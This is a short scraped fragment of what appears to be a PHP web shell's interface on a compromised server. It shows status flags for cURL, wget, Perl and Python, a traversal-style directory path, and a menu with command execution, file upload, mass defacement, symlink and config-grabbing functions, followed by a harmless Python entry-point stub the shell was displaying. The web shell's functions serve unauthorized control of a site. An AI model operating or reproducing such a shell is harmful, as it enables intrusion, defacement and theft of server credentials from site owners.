OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /../../usr/lib/man-db/../dbus-1.0/../python3.8/email/../venv/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
import sys from . import main rc = 1 try: main() rc = 0 except Exception as e: print('Error: %s' % e, file=sys.stderr) sys.exit(rc)